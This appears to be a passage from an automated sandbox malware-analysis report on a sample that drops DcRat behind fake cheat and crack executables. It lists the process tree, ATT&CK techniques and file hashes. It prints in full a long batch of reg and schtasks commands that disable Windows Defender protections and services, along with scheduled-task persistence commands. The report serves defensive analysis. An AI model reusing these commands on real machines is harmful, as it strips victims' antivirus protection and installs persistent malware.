1600 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1600 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1600 3308 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe"C:\Users\Admin\AppData\Local\Temp\11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe"1⤵
- DcRat
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Users\Admin\AppData\Local\Temp\Primordial Crack.exe"C:\Users\Admin\AppData\Local\Temp\Primordial Crack.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe"C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3312 -
C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe"C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4032 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:2684 -
C:\blockweb\portrefNet.exe"C:\blockweb\portrefNet.exe"8⤵
- DcRat
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BQLceR2Si2.bat"9⤵PID:1780
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:1668
-
-
C:\blockweb\smss.exe"C:\blockweb\smss.exe"10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"6⤵
- System Location Discovery: System Language Discovery
PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windows defender.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- System Location Discovery: System Language Discovery
PID:1780
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1972
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3648
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:3460
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
- System Location Discovery: System Language Discovery
PID:2200
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
- System Location Discovery: System Language Discovery
PID:4980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
- System Location Discovery: System Language Discovery
PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:1180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
- System Location Discovery: System Language Discovery
PID:1664
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:4680
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
- System Location Discovery: System Language Discovery
PID:3472
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3564
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:5112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:5000
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windows defender.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:4280
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2960
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4524
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1136
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2324
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:1600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:3640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:4924
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:404
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:1868
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2404
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4240
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:1436
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Windows\RemotePackages\RemoteApps\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\blockweb\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockweb\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\blockweb\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4028
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58094b248fe3231e48995c2be32aeb08c
SHA12fe06e000ebec919bf982d033c5d1219c1f916b6
SHA256136c30d964f4abbb5279bdc86d0e00578333782f15f05f0d2d050730dcb7a9bc
SHA512bf27a3822008796370e2c506c910a40992b9240606ea1bc19f683b2fee86b81897660ac0cf8e746ca093dae9e408949e2e9002ded75678a69f020d3b0452801f
-
Filesize
229KB
MD506129ffc46e854930cfcaa754ca1d487
SHA1e7c173c48aa107ec63bd6f9030c9ec6fe889d832
SHA25610d28e18a7df4b2c30e05e5e361f1724e0b6ea8c021d8105ee30354be79b98d1
SHA512b7121a2a65f317edbc1b4dd8dec427c277fad2b521a211d1408bc06b79431c418dad32ed61481c5ef49511cd167846e026a86147ae77bd9b0e607918feb66ab9
-
Filesize
185B
MD5043de4281cd0d3ceca9e7d989bbcf1c3
SHA158f82cdb2c80e08642cb6a1807ab08aa5e813db1
SHA25679f65b1f0fe41a23725f4445b46f13e127b2559bdb8b8c26a6e05ea3edd46797
SHA512ae0aa6d238fa85c775001f790e157732c469d5424b68efe3d2e9299e7ce1319ae6b6010347ce4adea0a43f9ba61dd96291f477dee932367e4e756eed63f4a8e7
-
Filesize
2.5MB
MD56e01d4882274684f48e04436103ad57f
SHA13b88df5fc9e6973bf3ecb1e2ed759b86774cb290
SHA256424497764bc1e2cd57f454d173dceeb9dcd7f900aaf5060110da629d11fadf8d
SHA5123e5ed6ee7458f4662dd9bbe572620fc591e69fbc6d8e98013ec0f39a95eb9da55561a232eea23192fbc59368b99f99ee6a00df23bcff253c327aa3eb607c7d7e
-
Filesize
7.5MB
MD5b76057df968a944446f950dd4ddc6aec
SHA1bb64de1c677368764000d34c29528ead2f48405c
SHA256afe91fea04d39de5710ad065252d13b9df7b7bd25788ddf5afb162a2f0a03296
SHA5127f45198fe05013ceab477784bde2b1c4532607bd8ba8d9cfb09c5bb037dd2616086c8cb3afd669b24ec89eedbd270d00f1bd6bce2644b40ed36b8f32fc5fdb31
-
Filesize
12.7MB
MD57db5128f7a81cc1af094d8898e79ff21
SHA1d503984331d5999c14931c267d859fbd1510c282
SHA2562952fa4ab9bc3e2b04b1f3ab6b648d0d23fa74856c50bf21fb13fddfe9a874bb
SHA512caceec284b71df124d47267e5ca42bf84e558aa9606b0186f132fba8d2bead2ddbd9304cd82761270b6c42271e0937aeff605ef5d865c424cc29b39ca05b123a
-
Filesize
12.7MB
MD5bbd6ffdb33259778f08704696a04891f
SHA10fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
SHA256841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
SHA5121b66f11b3a3dea1e6a8f4f7ee493437a41e30704d1c80048efd245184a447fde6abf06fe45af0663a72b30b657a7297554df8c3af7b36ae2e0df21a5031a34e0
-
Filesize
3KB
MD54c35b71d2d89c8e8eb773854085c56ea
SHA1ede16731e61348432c85ef13df4beb2be8096d9b
SHA2563efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d
-
Filesize
221B
MD5ca2cae3c10113fc32484a48196e2ffaa
SHA18eb74a53fe655c5b538246f42cc078d8900bf215
SHA25698311058614dd00a0d0e9e9c38f9df5d1d951525741fc46901d1a396baddd8f2
SHA5126cf05ca56f4c6320bc490401e742f81230e6c138651d958776f497d5e4889fe16c5853a1864791a3f10b4b3d103f5218894be4c7009d1eb7b32e243111b166af
-
Filesize
39B
MD519fe83feec263d4e4e68e3dd0e6b3615
SHA17ff948a654d54acfde0e798fe1d67160343f8dfd
SHA25607dc5ed69f4847071b41d0086ef8a11032c2d85b1ec8a8b00a5d29480c3e6744
SHA512ee6fef4211b60dff50b7cdb88f9ec0028a67bc428ab854c0932db7e5873f9a22e16760d59ff6b885fdb96ed7f6582d3735f629d6e825dcfd1e8c13c5d5adae78
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
2.2MB
MD584c6cb042dc58a109dfa2db8381bec28
SHA14a86e72e9d2c3e0c17cd3a09df754169f4b7ce31
SHA2562e09ed806f9a7c57186872ab3715909437e2729500bc194e0a2cf3405c4cd5f0
SHA512c8ef31a3eaeac8ef0faa043d0bdd085063d54572d0a7eefade08a9db5f97c397bb3270baca71817da9d91c0d1227fcee9ce019065bb5a66f20fed9d7349ab0ef